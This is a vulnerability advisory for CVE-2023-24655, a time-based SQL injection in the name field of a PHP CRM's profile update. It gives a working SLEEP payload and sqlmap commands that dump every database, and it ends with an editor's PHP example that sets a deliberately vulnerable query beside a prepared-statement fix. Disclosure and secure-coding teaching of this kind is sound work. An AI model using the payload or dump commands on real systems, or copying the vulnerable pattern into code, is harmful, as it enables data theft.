CVE-2023-24655: CVE/CVE-2023-24655.txt at main · y0gesh-verma/CVE
Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function.
> [Suggested description]
> Simple Customer Relationship Management System v1.0 was discovered to
> contain a SQL injection vulnerability via the name parameter under the
> Profile Update function.
>
> ------------------------------------------
>
> [Additional Information]
> Steps-To-Reproduce:
> 1. Register a user by navigating to the URL: http://localhost/php-scrm/registration.php
> 2. Log in as the registered user with valid credentials by following the URL: http://localhost/php-scrm/login.php
> 3. Navigate to the profile update page by following the URL: http://localhost/php-scrm/profile.php
> 4. Fill out the profile form, then intercept the request in Burp Suite.
> 5. Send the intercepted request to Burp Repeater.
> Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> 6. Insert the payload into the name parameter:
>
> Content-Disposition: form-data; name="name"
>
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
>
> 7. Click the "Send" button to send the request.
> 8. The response is delayed by 10 seconds, which shows the parameter is vulnerable to SQL injection.
> 9. Dump data by using sqlmap.
> 10. Copy the Burp-intercepted request into a file named crm-profile-request.txt
>
> 11. Dump the databases with sqlmap:
> # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch
> 12. Dump all data with sqlmap:
> # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> https://www.sourcecodester.com
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Simple Customer Relationship Management (CRM) System - 1.0
>
> ------------------------------------------
>
> [Affected Component]
> http://localhost/php-scrm/profile.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Escalation of Privileges]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> SQL injection is a type of cyber attack in which an attacker inserts malicious input into a website's SQL statements in order to gain unauthorized access to sensitive information stored in a database. This type of attack can be used to steal sensitive information such as login credentials, personal information, and financial data. These attacks can have serious consequences, including:
>
> 1. Theft of sensitive data: An attacker can use SQL injection to access and steal confidential data from a database, such as passwords, financial information, or personal information.
> 2. Modification of data: An attacker can use SQL injection to alter or delete data from a database, potentially causing incorrect results or system failures.
> 3. Server compromise: In some cases, an attacker can use SQL injection to gain unauthorized access to the underlying operating system and take complete control of the server.
>
> ------------------------------------------
>
> [Reference]
> https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
> https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip
>
> ------------------------------------------
>
> [Discoverer]
> Yogesh Verma

Use CVE-2023-24655.
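The advisory does not include the affected source, so the following is an added example written by the editor and not code from php-scrm or its author. It reconstructs, as a hypothetical, the class of bug the report describes (the submitted name interpolated straight into an UPDATE statement, which is why a quote followed by a SLEEP() subquery delays the response) and places beside it a hardened version of the same profile update using PDO prepared statements, where the query text is fixed and the name can only ever be a column value. The table and column names (users, name, id), the session key user_id, and the connection placeholders are all assumptions.

```php
<?php
// Added example (editor's own, not php-scrm code). Assumed schema: table
// `users` with columns `id` and `name`. Connection values are placeholders.
function connect(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=PLACEHOLDER_DB;charset=utf8mb4',
        'PLACEHOLDER_USER',
        'PLACEHOLDER_PASS',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );
}

// Vulnerable pattern (hypothetical reconstruction of the bug class in the
// advisory): the user-controlled name is concatenated into the SQL text, so a
// value containing a quote terminates the string literal and whatever follows
// is parsed as SQL. A time-based probe like the one in the report shows up as
// a response that takes as long as the SLEEP() it carries.
function updateNameVulnerable(PDO $pdo, int $userId, string $name): int
{
    $sql = "UPDATE users SET name = '" . $name . "' WHERE id = " . $userId;
    return $pdo->exec($sql);
}

// Hardened version: the statement is prepared once with placeholders and the
// name is bound as data. The database never reparses it as SQL, regardless of
// quotes, comments or subqueries in the value. Length validation is a second,
// independent limit on what a profile name may contain.
function updateNameSafe(PDO $pdo, int $userId, string $name): int
{
    $name = trim($name);
    if ($name === '' || mb_strlen($name) > 100) {
        throw new InvalidArgumentException('name must be 1-100 characters');
    }
    $stmt = $pdo->prepare('UPDATE users SET name = :name WHERE id = :id');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', $userId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Request handling as a profile.php-style endpoint might do it (assumed
// layout): the user id comes from the authenticated session, never from the
// form, and the POSTed name goes only through the parameterised path.
if (PHP_SAPI !== 'cli') {
    session_start();
    $userId = (int) ($_SESSION['user_id'] ?? 0);
    if ($userId <= 0) {
        http_response_code(401);
        exit('not logged in');
    }
    try {
        $rows = updateNameSafe(connect(), $userId, (string) ($_POST['name'] ?? ''));
        echo $rows === 1 ? 'profile updated' : 'no change';
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo $e->getMessage();
    }
}
```

With the prepared statement in place the same submitted value is stored verbatim as a name, and a 10-second delay in the profile update response no longer indicates anything about the query; binding the id as an integer from the session also removes the second interpolation point that the vulnerable form leaves open.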